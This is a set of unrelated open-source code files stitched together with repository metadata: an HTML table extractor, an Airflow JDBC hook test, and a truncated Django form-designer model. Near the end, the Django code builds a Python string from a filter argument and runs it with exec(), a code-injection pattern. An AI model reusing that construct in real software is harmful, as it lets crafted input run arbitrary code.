"path": "sdks/python/apache_beam/examples/cookbook/bigquery_tornadoes_it_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "1596"
},
{
"name": "CSS",
"bytes": "40964"
},
{
"name": "Dockerfile",
"bytes": "22983"
},
{
"name": "FreeMarker",
"bytes": "7428"
},
{
"name": "Go",
"bytes": "2508482"
},
{
"name": "Groovy",
"bytes": "300669"
},
{
"name": "HTML",
"bytes": "54277"
},
{
"name": "Java",
"bytes": "24796055"
},
{
"name": "JavaScript",
"bytes": "16472"
},
{
"name": "Jupyter Notebook",
"bytes": "54182"
},
{
"name": "Python",
"bytes": "4544133"
},
{
"name": "Ruby",
"bytes": "4099"
},
{
"name": "Shell",
"bytes": "180209"
}
],
"symlink_target": ""
} |
from typing import List
from etk.extractor import Extractor, InputType
from etk.extraction import Extraction
from bs4 import BeautifulSoup
from bs4.element import Comment
import re
import copy
import pandas as pd
from zipfile import ZipFile
from requests import get
class Toolkit:
@staticmethod
def create_table_array(t, put_extractions=False):
rows = t['rows']
tt = []
max_cols = t['features']['max_cols_in_a_row']
for r in rows:
new_r = ['' for xx in range(max_cols)]
for i, c in enumerate(r['cells']):
text = c['text']
text = text.lower()
text = text.strip()
if put_extractions and 'data_extraction' in c:
data_extractions = c['data_extraction']
for key in data_extractions.keys():
text += ' DUMMY' + key.upper()
new_r[i] = text.strip()
tt.append(new_r)
return tt
@staticmethod
def regulize_cells(t):
for r in t:
for i in range(len(r)):
r[i] = re.sub('[0-9]', 'NUM', r[i])
# for x in re.findall('([0-9])', r[i]):
# int_x = int(x)
# if int_x < 5:
# r[i] = re.sub(x, 'SSSS', r[i])
# else:
# r[i] = re.sub(x, 'LLLL', r[i])
for x in re.findall('([a-z][a-z][a-z]+@)', r[i]):
r[i] = re.sub(x, 'EMAILNAME ', r[i])
@staticmethod
def clean_cells(t): # modifies t
for r in t:
for i in range(len(r)):
r[i] = re.sub(r'[^\x00-\x7F]',' ', r[i]) #remove unicodes
# r[i] = re.sub('[\'"]', '', r[i]) #remove annoying puncts
r[i] = re.sub('[^\s\w\.\-\$_%\^&*#~+@"\']', ' ', r[i]) #remove annoying puncts
for x in re.findall('(\.[a-z])', r[i]):
r[i] = re.sub('\.{0}'.format(x[1]), ' {0}'.format(x[1]), r[i])
r[i] = re.sub('\s+', ' ', r[i])
r[i] = r[i].strip()
class EntityTableDataExtraction(Extractor):
def __init__(self) -> None:
Extractor.__init__(self,
input_type=InputType.OBJECT,
category="data",
name="DigEntityTableDataExtractor")
self.glossaries = dict()
def add_glossary(self, glossary: List[str], attr_name: str) -> None:
"""
Adds a glossary for the given attribute name
:param glossary: a list of possible mentions of the attribute name
:param attr_name: the attribute name (field name)
"""
self.glossaries[attr_name] = glossary
def wrap_value_with_context(self, value: dict, field_name: str, start: int=0, end: int=0) -> Extraction:
"""Wraps the final result"""
return Extraction(value, self.name, start_token=start, end_token=end, tag=field_name)
def extract(self, table: dict) -> List[Extraction]:
"""
:param table: a table extracted by table extractor, as a json object
:return: list of all extractions from the input table
"""
if table['features']['max_cols_in_a_row'] != 2 and table['features']['no_of_rows'] < 2:
return []
results = list()
for row in table['rows']:
if len(row['cells']) != 2:
continue
text = [row['cells'][0]['text'], row['cells'][1]['text']]
for field_name in self.glossaries.keys():
if self.cell_matches_dict(text[0], self.glossaries[field_name]):
results.append(self.wrap_value_with_context(text[1], field_name))
if self.cell_matches_dict(text[1], self.glossaries[field_name]):
results.append(self.wrap_value_with_context(text[0], field_name))
return results
def cell_matches_dict(self, cell_text: str, glossary: List[str]) -> bool:
if any([self.cell_matches_text(cell_text, x) for x in glossary]):
return True
return False
def cell_matches_text(self, cell_text: str, text: str) -> bool:
cell_text = cell_text.lower()
text = text.lower()
if text in cell_text and float(len(cell_text))/float(len(text)) < 1.5:
return True
return False
class TableExtraction:
@staticmethod
def is_data_cell(cell):
if cell.table:
return False
return True
@staticmethod
def is_data_row(row):
if row.table:
return False
cell = row.findAll('th', recursive=False)
cell.extend(row.findAll('td', recursive=False))
for td in cell:
if TableExtraction.is_data_cell(td) == False:
return False
return True
@staticmethod
def get_data_rows(table):
data_rows = []
rows = table.findAll('tr', recursive=False)
if table.thead:
rows.extend(table.thead.findAll('tr', recursive=False))
if table.tbody:
rows.extend(table.tbody.findAll('tr', recursive=False))
for tr in rows:
if TableExtraction.is_data_row(tr):
data_rows.append(tr)
return data_rows
@staticmethod
def is_data_table(table, k):
rows = TableExtraction.get_data_rows(table)
if len(rows) > k:
return rows
else:
return False
@staticmethod
def mean(numbers):
""" Computes mean of a list of numbers """
return float(sum(numbers)) / max(len(numbers), 1)
@staticmethod
def _ss(data):
"""Return sum of square deviations of sequence data."""
c = TableExtraction.mean(data)
ss = sum((x-c)**2 for x in data)
return ss
@staticmethod
def pstdev(data):
"""Calculates the population standard deviation."""
n = len(data)
if n < 2:
return 0
# raise ValueError('variance requires at least two data points')
ss = TableExtraction._ss(data)
pvar = ss/n # the population variance
return pvar**0.5
@staticmethod
# Check if a string contains a digit
def contains_digits(d):
_digits = re.compile('\d')
return bool(_digits.search(d))
@staticmethod
def gen_context(seq):
seen = set()
seen_add = seen.add
uniq_list = [x for x in seq if not (x in seen or seen_add(x))]
if len(uniq_list) > 5:
uniq_list = uniq_list[:5]
uniq_list = [x.replace("\t", "").replace("\r", "").replace("\n", "").strip() for x in uniq_list]
if '' in uniq_list:
uniq_list.remove('')
if ' ' in uniq_list:
uniq_list.remove(' ')
return uniq_list
@staticmethod
def convert_to_csv(jobj, outpath):
with ZipFile(outpath, 'w') as myzip:
for ti, t in enumerate(jobj['tables']):
with myzip.open(f't{ti}.csv', 'w') as myfile:
tarr = [[c['text'] if c is not None else '' for c in r['cells']] for r in t['rows']]
csv = pd.DataFrame(tarr).to_csv(index=False, header=False)
myfile.write(csv.encode('utf-8'))
myfile.close()
@staticmethod
def extract(input_data, expand_merged_cells=False,
input_format='html', output_format='json',
min_data_rows=1, output_path=None):
"""extract tables from input data.
Args:
input_data (str): input url/html.
expand_merged_cells (bool): replicate the value of merged cells.
input_format (str): the form of input data, {html, pdf}
output_format (str): output format, {json, csv}
min_data_rows (int): minimum number of rows for data tables.
output_path (str): path to output file if output format is csv.
Returns:
bool: json object if output_format is json, None otherwise.
Examples:
>>> url = 'https://en.wikipedia.org/wiki/United_States'
>>> html = requests.get(url).text
>>> te = TableExtraction()
>>> res = te.extract(html, expand_merged_cells=False,
output_format='csv', output_path='test.zip')
>>> res = te.extract(html)['tables'][0]['text']
United States of America | \nFlag Coat of arms | \nMot ....
>>> url = 'https://www.imf.org/~/media/Files/Publications/WP/wp1715.ashx'
>>> te.extract(url, input_format='pdf',
expand_merged_cells=False, output_format='csv',
output_path='test.csv')
"""
if input_format == 'html':
json_output = TableExtraction.extract_html(input_data, expand_merged_cells, min_data_rows)
if output_format == 'json':
return json_output
elif output_format == 'csv':
return TableExtraction.convert_to_csv(json_output, output_path)
elif input_format == 'pdf':
import tabula
res = get(input_data)
with open(output_path+".pdf", 'wb') as tempfile:
tempfile.write(res.content)
tempfile.close()
tabula.convert_into(output_path+".pdf", output_path, output_format="zip", pages='all')
@staticmethod
def extract_html(html_doc, expand_merged_cells, min_data_rows=1):
soup = BeautifulSoup(html_doc, 'html5lib')
result_tables = list()
tables = soup.findAll('table')
for table_i, table in enumerate(tables):
tdcount = 0
max_tdcount = 0
img_count = 0
href_count = 0
inp_count = 0
sel_count = 0
colspan_count = 0
colon_count = 0
len_row = 0
table_data = ""
data_table = dict()
row_list = list()
rows = TableExtraction.is_data_table(table, min_data_rows)
if rows != False:
features = dict()
row_len_list = list()
avg_cell_len = 0
avg_row_len_dev = 0
num_rows = 0
num_cols = 0
max_cols = 0
row_shift = 0
## detect merged cells and find table demension
merged_cells = []
row_spans = dict()
for ri, row in enumerate(rows):
rshift = 0
num_rows += 1
num_cols = 0
col_shift = 0
ci = 0
for ci, c in enumerate(row.findAll(['td', 'th'])):
num_cols += 1
ci += col_shift+rshift
# shift the col index if there are any spanning cells above it
while ci in row_spans:
if row_spans[ci] <= 0:
del row_spans[ci]
else:
rshift += 1
row_spans[ci] -= 1
ci += 1
cspan = c.get('colspan')
rspan = c.get('rowspan')
# record spanned cell for later use
if cspan is not None and rspan is not None:
cspan = int(cspan)
rspan = int(rspan)
col_shift += cspan-1
for ii in range(ci, ci+cspan):
row_spans[ii] = rspan-1
merged_cells.append((ri, ri+rspan, ci, ci+cspan))
elif cspan is not None:
cspan = int(cspan)
col_shift += cspan-1
merged_cells.append((ri, ri+1, ci, ci+cspan))
elif rspan is not None:
rspan = int(rspan)
row_spans[ci] = rspan-1
merged_cells.append((ri, ri+rspan, ci, ci+1))
if max_cols < num_cols:
max_cols = num_cols
# update rowspan dict for columns not seen in this iteration
for k, v in row_spans.items():
if k > ci:
row_spans[k] -= 1
if len(merged_cells) > 0:
max_cols = max(max_cols, max([x[3] for x in merged_cells]))
num_rows = max(len(rows), max([x[1] for x in merged_cells]))
else:
num_rows = len(rows)
## create table array
row_spans = dict()
for ri, row in enumerate(rows):
row_data = ' '.join(row.stripped_strings)
row_data = row_data.replace("\\t", "").replace("\\r", "").replace("\\n", "")
row_len_list.append(len(row_data))
row_tdcount = len(row.findAll('td')) + len(row.findAll('th'))
if row_tdcount > max_tdcount:
max_tdcount = row_tdcount
tdcount += row_tdcount
img_count += len(row.findAll('img'))
href_count += len(row.findAll('a'))
inp_count += len(row.findAll('input'))
sel_count += len(row.findAll('select'))
colspan_count += row_data.count("colspan")
colon_count += row_data.count(":")
len_row += 1
table_data += str(row)
row_dict = dict()
newr = [None]*max_cols
shift = 0
rshift = 0
ci = 0
for i, c in enumerate(row.findAll(['td', 'th'])):
ci = i+shift+rshift
while ci in row_spans:
if row_spans[ci] <= 0:
del row_spans[ci]
else:
rshift += 1
row_spans[ci] -= 1
ci += 1
for br in c.find_all("br"):
br.replace_with(" ")
for br in c.find_all("script"):
br.decompose()
cell_dict = dict()
cell_dict["cell"] = str(c)
cell_dict["text"] = ' '.join(c.stripped_strings)
cell_dict["id"] = 'row_{0}_col_{1}'.format(ri, ci)
avg_cell_len += len(cell_dict["text"])
newr[ci] = cell_dict
cspan = c.get('colspan')
rspan = c.get('rowspan')
if cspan is not None and rspan is not None:
cspan = int(cspan)
rspan = int(rspan)
shift += cspan-1
for ii in range(ci, ci+cspan):
row_spans[ii] = rspan-1
elif rspan is not None:
rspan = int(rspan)
row_spans[ci] = rspan-1
elif cspan is not None:
cspan = int(cspan)
shift += cspan-1
for i in range(ci+1, max_cols):
if i in row_spans:
row_spans[i] -= 1
avg_row_len_dev += TableExtraction.pstdev([len(x["text"]) if x else 0 for x in newr])
row_dict["cells"] = newr
row_dict["text"] = TableExtraction.row_to_text(newr)
row_dict["html"] = TableExtraction.row_to_html(newr)
row_dict["id"] = "row_{}".format(ri)
row_list.append(row_dict)
if expand_merged_cells:
# replicate merged cells
N = len(row_list)
M = max_cols
for m in merged_cells:
if row_list[m[0]]['cells'][m[2]] is None:
print(m)
for ii in range(m[0], min(m[1], N)):
for jj in range(m[2], min(m[3], M)):
if ii == m[0] and jj == m[2]:
continue
row_list[ii]['cells'][jj] = copy.deepcopy(row_list[m[0]]['cells'][m[2]])
row_list[ii]['cells'][jj]['id'] += '_span_row{}_col{}'.format(ii,jj)
# To avoid division by zero
if len_row == 0:
tdcount = 1
features['merged_cells'] = merged_cells
features["no_of_rows"] = len_row
features["no_of_cells"] = tdcount
features["max_cols_in_a_row"] = max_tdcount
features["ratio_of_img_tags_to_cells"] = img_count*1.0/tdcount
features["ratio_of_href_tags_to_cells"] = href_count*1.0/tdcount
features["ratio_of_input_tags_to_cells"] = inp_count*1.0/tdcount
features["ratio_of_select_tags_to_cells"] = sel_count*1.0/tdcount
features["ratio_of_colspan_tags_to_cells"] = colspan_count*1.0/tdcount
features["ratio_of_colons_to_cells"] = colon_count*1.0/tdcount
features["avg_cell_len"] = avg_cell_len*1.0/tdcount
features["avg_row_len"] = TableExtraction.mean(row_len_list)
features["avg_row_len_dev"] = avg_row_len_dev*1.0/max(len_row, 1)
avg_col_len = 0
avg_col_len_dev = 0
no_of_cols_containing_num = 0
no_of_cols_empty = 0
if colspan_count == 0.0 and \
len_row != 0 and \
(tdcount/(len_row * 1.0)) == max_tdcount:
col_data = dict()
for i in range(max_tdcount):
col_data['c_{0}'.format(i)] = []
soup_col = BeautifulSoup(table_data, 'html.parser')
for row in soup_col.findAll('tr'):
h_index = 0
h_bool = True
for col in row.findAll('th'):
col_content = ' '.join(col.stripped_strings)
h_bool = False
if col_content is None:
continue
else:
col_data['c_{0}'.format(h_index)].append(col_content)
h_index += 1
d_index = 0
if(h_index == 1 and h_bool == False):
d_index = 1
for col in row.findAll('td'):
col_content = ' '.join(col.stripped_strings)
if col_content is None:
d_index += 1
continue
else:
col_data['c_{0}'.format(d_index)].append(col_content)
d_index += 1
for key, value in col_data.items():
whole_col = ' '.join(value)
# avg_cell_len += float("%.2f" % mean([len(x) for x in value]))
avg_col_len += sum([len(x) for x in value])
avg_col_len_dev += TableExtraction.pstdev([len(x) for x in value])
no_of_cols_containing_num += 1 if TableExtraction.contains_digits(whole_col) is True else 0
# features["column_" + str(key) + "_is_only_num"] = whole_col.isdigit()
no_of_cols_empty += 1 if (whole_col == '') is True else 0
# To avoid division by zero
if max_tdcount == 0:
max_tdcount = 1
features["avg_col_len"] = avg_col_len*1.0/max_tdcount
features["avg_col_len_dev"] = avg_col_len_dev/max_tdcount
features["no_of_cols_containing_num"] = no_of_cols_containing_num
features["no_of_cols_empty"] = no_of_cols_empty
data_table["features"] = features
data_table["rows"] = row_list
context_before = ' '.join(TableExtraction.gen_context(table.find_all_previous(string=True)))
context_after = ' '.join(TableExtraction.gen_context(table.find_all_next(string=True)))
table_rep = TableExtraction.gen_html(row_list)
fingerprint = TableExtraction.create_fingerprint(table_rep)
data_table["context_before"] = context_before
data_table["context_after"] = context_after
data_table["fingerprint"] = fingerprint
data_table['html'] = str(table)
data_table['text'] = TableExtraction.table_to_text(row_list)
result_tables.append(data_table)
table.decompose()
return dict(tables=result_tables, html_text=TableExtraction.text_from_html(soup))
@staticmethod
def create_fingerprint(table):
table = str(table)
all_tokens = list(set(re.split('[^\w]+',table)))
all_tokens = sorted(all_tokens)
fingerprint = '-'.join(all_tokens)
return fingerprint
@staticmethod
def row_to_html(cells):
res = '<html><body><table>'
for i, c in enumerate(cells):
t = c['cell'] if c else ''
res += t + '\n'
res += '</table></body></html>'
return res
@staticmethod
def row_to_text(cells):
res = ''
for i, c in enumerate(cells):
t = c['text'] if c else ''
res += t
if i < len(cells)-1:
res += ' | '
return res
@staticmethod
def table_to_text(rows):
res = ''
for row in rows:
for i, c in enumerate(row['cells']):
t = c['text'] if c else ''
res += t
if i < len(row['cells']) - 1:
res += ' | '
res += '\n'
return res
@staticmethod
def gen_html(row_list):
""" Return html table string from a list of data rows """
table = "<table>"
for row in row_list:
table += "<tr>"
cells = row["cells"]
for c in cells:
t = c['cell'] if c else ''
table += t
table += "</tr>"
table += "</table>"
return table
@staticmethod
def remove_tables(html_doc, min_data_rows = 1):
soup = BeautifulSoup(html_doc, 'html.parser')
tables = soup.findAll('table')
for table in tables:
rows = TableExtraction.is_data_table(table, min_data_rows)
if rows != False:
table.decompose()
return soup
@staticmethod
def tag_visible(element):
if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]']:
return False
if isinstance(element, Comment):
return False
return True
@staticmethod
def text_from_html(soup):
texts = soup.findAll(text=True)
visible_texts = filter(TableExtraction.tag_visible, texts)
# print([x.strip() for x in visible_texts])
# exit(0)
return u" ".join(t.strip() for t in visible_texts if t.strip() != "")
class TableExtractor(Extractor):
"""
**Description**
Adding explanation here
Examples:
::
table_extractor = TableExtractor()
table_extractor.extract(html=html_str,
return_text=True)
"""
def __init__(self) -> None:
Extractor.__init__(self,
input_type=InputType.TEXT,
category="content",
name="DigTableExtractor")
self.tableExtractorInstance = TableExtraction()
def _wrap_value_with_context(self, value: dict or str, field_name: str, start: int=0, end: int=0) -> Extraction:
"""Wraps the final result"""
return Extraction(value, self.name, start_token=start, end_token=end, tag=field_name)
def extract(self, html: str, return_text: bool = False, expand_merged_cells: bool = True) -> List[Extraction]:
"""
Args:
html (str): raw html of the page
return_text (bool): if True, return the visible text in the page
removing all the data tables
Returns:
List[Extraction]: a list of Extractions
"""
results = list()
temp_res = self.tableExtractorInstance.extract(html, expand_merged_cells=expand_merged_cells)
if return_text:
results.append(self._wrap_value_with_context(temp_res['html_text'], "text_without_tables"))
results.extend(map(lambda t: self._wrap_value_with_context(t, "tables"), temp_res['tables']))
return results
| {
"content_hash": "24721fa90d70fd09e5cac327a5872f4d",
"timestamp": "",
"source": "github",
"line_count": 624,
"max_line_length": 116,
"avg_line_length": 41.306089743589745,
"alnum_prop": 0.4663045586808923,
"repo_name": "usc-isi-i2/etk",
"id": "49db728651e1677148881c1145fd6863aaddbd8e",
"size": "25799",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "etk/extractors/table_extractor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "4590"
},
{
"name": "HTML",
"bytes": "1048891"
},
{
"name": "Julia",
"bytes": "874347"
},
{
"name": "Jupyter Notebook",
"bytes": "123779"
},
{
"name": "Makefile",
"bytes": "601"
},
{
"name": "Python",
"bytes": "807682"
},
{
"name": "Shell",
"bytes": "259"
}
],
"symlink_target": ""
} |
from __future__ import annotations
import json
import os
from unittest.mock import Mock, patch
import pytest
from pytest import param
from airflow.models import Connection
from airflow.providers.jdbc.hooks.jdbc import JdbcHook
from airflow.utils import db
jdbc_conn_mock = Mock(name="jdbc_conn")
class TestJdbcHook:
def setup_method(self):
db.merge_conn(
Connection(
conn_id="jdbc_default",
conn_type="jdbc",
host="jdbc://localhost/",
port=443,
extra=json.dumps(
{
"extra__jdbc__drv_path": "/path1/test.jar,/path2/t.jar2",
"extra__jdbc__drv_clsname": "com.driver.main",
}
),
)
)
@patch("airflow.providers.jdbc.hooks.jdbc.jaydebeapi.connect", autospec=True, return_value=jdbc_conn_mock)
def test_jdbc_conn_connection(self, jdbc_mock):
jdbc_hook = JdbcHook()
jdbc_conn = jdbc_hook.get_conn()
assert jdbc_mock.called
assert isinstance(jdbc_conn, Mock)
assert jdbc_conn.name == jdbc_mock.return_value.name
@patch("airflow.providers.jdbc.hooks.jdbc.jaydebeapi.connect")
def test_jdbc_conn_set_autocommit(self, _):
jdbc_hook = JdbcHook()
jdbc_conn = jdbc_hook.get_conn()
jdbc_hook.set_autocommit(jdbc_conn, False)
jdbc_conn.jconn.setAutoCommit.assert_called_once_with(False)
@patch("airflow.providers.jdbc.hooks.jdbc.jaydebeapi.connect")
def test_jdbc_conn_get_autocommit(self, _):
jdbc_hook = JdbcHook()
jdbc_conn = jdbc_hook.get_conn()
jdbc_hook.get_autocommit(jdbc_conn)
jdbc_conn.jconn.getAutoCommit.assert_called_once_with()
@pytest.mark.parametrize(
"uri",
[
param(
"a://?extra__jdbc__drv_path=abc&extra__jdbc__drv_clsname=abc",
id="prefix",
),
param("a://?drv_path=abc&drv_clsname=abc", id="no-prefix"),
],
)
@patch("airflow.providers.jdbc.hooks.jdbc.jaydebeapi.connect")
def test_backcompat_prefix_works(self, mock_connect, uri):
with patch.dict(os.environ, {"AIRFLOW_CONN_MY_CONN": uri}):
hook = JdbcHook("my_conn")
hook.get_conn()
mock_connect.assert_called_with(
jclassname="abc",
url="",
driver_args=["None", "None"],
jars="abc".split(","),
)
@patch("airflow.providers.jdbc.hooks.jdbc.jaydebeapi.connect")
def test_backcompat_prefix_both_prefers_short(self, mock_connect):
with patch.dict(
os.environ,
{"AIRFLOW_CONN_MY_CONN": "a://?drv_path=non-prefixed&extra__jdbc__drv_path=prefixed"},
):
hook = JdbcHook("my_conn")
hook.get_conn()
mock_connect.assert_called_with(
jclassname=None,
url="",
driver_args=["None", "None"],
jars="non-prefixed".split(","),
)
| {
"content_hash": "470e991ea335277f0c8e17fa9d647635",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 110,
"avg_line_length": 34.26373626373626,
"alnum_prop": 0.5599743425272611,
"repo_name": "apache/airflow",
"id": "50913b023769bd4c3bc68aac437d49d81d246ecb",
"size": "3905",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "tests/providers/jdbc/hooks/test_jdbc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "25980"
},
{
"name": "Dockerfile",
"bytes": "71458"
},
{
"name": "HCL",
"bytes": "3786"
},
{
"name": "HTML",
"bytes": "172957"
},
{
"name": "JavaScript",
"bytes": "143915"
},
{
"name": "Jinja",
"bytes": "38911"
},
{
"name": "Jupyter Notebook",
"bytes": "5482"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "23697738"
},
{
"name": "R",
"bytes": "313"
},
{
"name": "Shell",
"bytes": "211306"
},
{
"name": "TypeScript",
"bytes": "521019"
}
],
"symlink_target": ""
} |
from django.db import models
from django.utils.translation import ugettext, ugettext_lazy as _
from django.forms import widgets
from django.core.mail import send_mail
from django.conf import settings
from form_designer import app_settings
import re
from form_designer.pickled_object_field import PickledObjectField
from form_designer.model_name_field import ModelNameField
from form_designer.template_field import TemplateTextField, TemplateCharField
#==============================================================================
class FormDefinition(models.Model):
"""
A model that defines a form and its components and properties.
"""
name = models.SlugField(_('Name'), max_length=255, unique=True)
title = models.CharField(_('Title'), max_length=255, blank=True, null=True)
action = models.URLField(_('Target URL'), help_text=_('If you leave this empty, the page where the form resides will be requested, and you can use the mail form and logging features. You can also send data to external sites: For instance, enter "http://www.google.ch/search" to create a search form.'), max_length=255, blank=True, null=True)
mail_to = TemplateCharField(_('Send form data to e-mail address'), help_text=('Separate several addresses with a comma. Your form fields are available as template context. Example: "[email protected], {{ from_email }}" if you have a field named `from_email`.'), max_length=255, blank=True, null=True)
mail_from = TemplateCharField(_('Sender address'), max_length=255, help_text=('Your form fields are available as template context. Example: "{{ firstname }} {{ lastname }} <{{ from_email }}>" if you have fields named `first_name`, `last_name`, `from_email`.'), blank=True, null=True)
mail_subject = TemplateCharField(_('e-Mail subject'), max_length=255, help_text=('Your form fields are available as template context. Example: "Contact form {{ subject }}" if you have a field named `subject`.'), blank=True, null=True)
method = models.CharField(_('Method'), max_length=10, default="POST", choices = (('POST', 'POST'), ('GET', 'GET')))
success_message = models.CharField(_('Success message'), max_length=255, blank=True, null=True)
error_message = models.CharField(_('Error message'), max_length=255, blank=True, null=True)
submit_label = models.CharField(_('Submit button label'), max_length=255, blank=True, null=True)
log_data = models.BooleanField(_('Log form data'), help_text=_('Logs all form submissions to the database.'), default=True)
success_redirect = models.BooleanField(_('Redirect after success'), help_text=_('You should install django_notify if you want to enable this.') if not 'django_notify' in settings.INSTALLED_APPS else None, default=False)
success_clear = models.BooleanField(_('Clear form after success'), default=True)
allow_get_initial = models.BooleanField(_('Allow initial values via URL'), help_text=_('If enabled, you can fill in form fields by adding them to the query string.'), default=True)
message_template = TemplateTextField(_('Message template'), help_text=_('Your form fields are available as template context. Example: "{{ message }}" if you have a field named `message`. To iterate over all fields, use the variable `data` (a list containing a dictionary for each form field, each containing the elements `name`, `label`, `value`).'), blank=True, null=True)
form_template_name = models.CharField(_('Form template'), max_length=255, choices=app_settings.get('FORM_DESIGNER_FORM_TEMPLATES'), blank=True, null=True)
#--------------------------------------------------------------------------
class Meta:
verbose_name = _('form')
verbose_name_plural = _('forms')
#--------------------------------------------------------------------------
def get_field_dict(self):
dict = {}
for field in self.fields.all():
dict[field.name] = field
return dict
#--------------------------------------------------------------------------
def get_form_data(self, form):
data = []
field_dict = self.get_field_dict()
form_keys = form.fields.keys()
def_keys = field_dict.keys()
for key in form_keys:
if key in def_keys and field_dict[key].include_result:
value = form.cleaned_data[key]
if getattr(value, '__form_data__', False):
value = value.__form_data__()
data.append({'name': key, 'label': form.fields[key].label, 'value': value})
return data
#--------------------------------------------------------------------------
def get_form_data_dict(self, form_data):
dict = {}
for field in form_data:
dict[field['name']] = field['value']
return dict
#--------------------------------------------------------------------------
def compile_message(self, form_data, template=None):
from django.template.loader import get_template
from django.template import Context, Template
if template:
t = get_template(template)
elif not self.message_template:
t = get_template('txt/formdefinition/data_message.txt')
else:
t = Template(self.message_template)
context = Context(self.get_form_data_dict(form_data))
context['data'] = form_data
return t.render(context)
#--------------------------------------------------------------------------
def count_fields(self):
return self.fields.count()
count_fields.short_description = _('Fields')
#--------------------------------------------------------------------------
def __unicode__(self):
return self.title or self.name
#--------------------------------------------------------------------------
def log(self, form):
"""
Saves the form submission.
"""
form_data = self.get_form_data(form)
field_dict = self.get_field_dict()
# create a submission
submission = FormSubmission()
submission.save()
# log each field's value individually
for field_data in form_data:
field_submission = FormFieldSubmission(submission=submission, definition_field=field_dict[field_data['name']],
value=field_data['value'])
field_submission.save()
return submission
#--------------------------------------------------------------------------
def string_template_replace(self, text, context_dict):
from django.template import Context, Template, TemplateSyntaxError
try:
t = Template(text)
return t.render(Context(context_dict))
except TemplateSyntaxError:
return text
#--------------------------------------------------------------------------
def send_mail(self, form):
form_data = self.get_form_data(form)
message = self.compile_message(form_data)
context_dict = self.get_form_data_dict(form_data)
import re
mail_to = re.compile('\s*[,;]+\s*').split(self.mail_to)
for key, email in enumerate(mail_to):
mail_to[key] = self.string_template_replace(email, context_dict)
mail_from = self.mail_from or None
if mail_from:
mail_from = self.string_template_replace(mail_from, context_dict)
if self.mail_subject:
mail_subject = self.string_template_replace(self.mail_subject, context_dict)
else:
mail_subject = self.title
import logging
logging.debug('Mail: '+repr(mail_from)+' --> '+repr(mail_to));
from django.core.mail import send_mail
send_mail(mail_subject, message, mail_from or None, mail_to, fail_silently=False)
#--------------------------------------------------------------------------
@property
def submit_flag_name(self):
name = app_settings.get('FORM_DESIGNER_SUBMIT_FLAG_NAME') % self.name
while self.fields.filter(name__exact=name).count() > 0:
name += '_'
return name
#--------------------------------------------------------------------------
def to_field_list(self):
"""
Converts this form definition into a list of dictionaries, each
dictionary representing a field and its components.
@param fields A list of fields to include. By default, if this is
None, all fields will be generated.
@param field_name_replacements
"""
field_arr = []
# run through all of the fields associated with this definition
for field in self.fields.all():
choices = []
if field.choices.count():
choices = [{'value': u'%s' % choice.value, 'label': u'%s' % choice.label} for choice in field.choices.all()]
elif field.choice_model:
choices = [{'value': u'%s' % obj.id, 'label': u'%s' % obj} for obj in ModelNameField.get_model_from_string(field.choice_model).objects.all()]
field_item = {
'name': u'%s' % field.name,
'label': u'%s' % field.label,
'class': u'%s' % field.field_class,
'position': u'%s' % field.position,
'widget': u'%s' % field.widget,
'initial': u'%s' % field.initial,
'help_text': u'%s' % field.help_text,
}
if choices:
field_item['choices'] = choices
#==============================================================================
class FormDefinitionFieldChoice(models.Model):
"""
A single choice available for a form definition field.
"""
label = models.TextField(_('Label'), help_text=_('A descriptive value for the choice'), blank=True, null=True)
value = models.TextField(_('Value'), help_text=_('The value of the choice when submitting the form'), blank=True, null=True)
#--------------------------------------------------------------------------
def __unicode__(self):
return u'%s (%s)' % (self.label, self.value)
#==============================================================================
class FieldChoiceContainer(object):
def __init__(self, value='', label=''):
self.value = value
self.label = label
#==============================================================================
class FormDefinitionField(models.Model):
"""
A single field within a form definition.
"""
form_definition = models.ForeignKey(FormDefinition, verbose_name=_('Form definition'), related_name='fields')
field_class = models.CharField(_('Field class'), choices=app_settings.get('FORM_DESIGNER_FIELD_CLASSES'), max_length=32)
position = models.IntegerField(_('Position'), blank=True, null=True)
name = models.SlugField(_('Name'), max_length=255)
label = models.CharField(_('Label'), max_length=255, blank=True, null=True)
required = models.BooleanField(_('Required'), default=True)
include_result = models.BooleanField(_('Include in result'), help_text=('If this is disabled, the field value will not be included in logs and e-mails generated from form data.'), default=True)
widget = models.CharField(_('Widget'), default='', choices=app_settings.get('FORM_DESIGNER_WIDGET_CLASSES'), max_length=255, blank=True, null=True)
initial = models.TextField(_('Initial value'), blank=True, null=True)
help_text = models.CharField(_('Help text'), max_length=255, blank=True, null=True)
# the new model
choices = models.ManyToManyField(FormDefinitionFieldChoice, verbose_name=_('Choices'), help_text=_('The various options from which the user can choose'), blank=True, null=True)
max_length = models.IntegerField(_('Max. length'), blank=True, null=True)
min_length = models.IntegerField(_('Min. length'), blank=True, null=True)
max_value = models.FloatField(_('Max. value'), blank=True, null=True)
min_value = models.FloatField(_('Min. value'), blank=True, null=True)
max_digits = models.IntegerField(_('Max. digits'), blank=True, null=True)
decimal_places = models.IntegerField(_('Decimal places'), blank=True, null=True)
regex = models.CharField(_('Regular Expression'), max_length=255, blank=True, null=True)
choice_model_choices = app_settings.get('FORM_DESIGNER_CHOICE_MODEL_CHOICES')
choice_model = ModelNameField(_('Data model'), max_length=255, blank=True, null=True, choices=choice_model_choices, help_text=_('your_app.models.ModelName' if not choice_model_choices else None))
choice_model_empty_label = models.CharField(_('Empty label'), max_length=255, blank=True, null=True)
#--------------------------------------------------------------------------
def save(self, *args, **kwargs):
if self.position == None:
self.position = 0
super(FormDefinitionField, self).save()
#--------------------------------------------------------------------------
def ____init__(self, field_class=None, name=None, required=None, widget=None, label=None, initial=None, help_text=None, *args, **kwargs):
super(FormDefinitionField, self).__init__(*args, **kwargs)
self.name = name
self.field_class = field_class
self.required = required
self.widget = widget
self.label = label
self.initial = initial
self.help_text = help_text
#--------------------------------------------------------------------------
def get_choices(self, filter=None, order_by=None):
queryset = None
if self.field_class in ('forms.ModelChoiceField', 'forms.ModelMultipleChoiceField'):
if filter:
exec('queryset = ModelNameField.get_model_from_string(self.choice_model).objects.%s' % filter)
else:
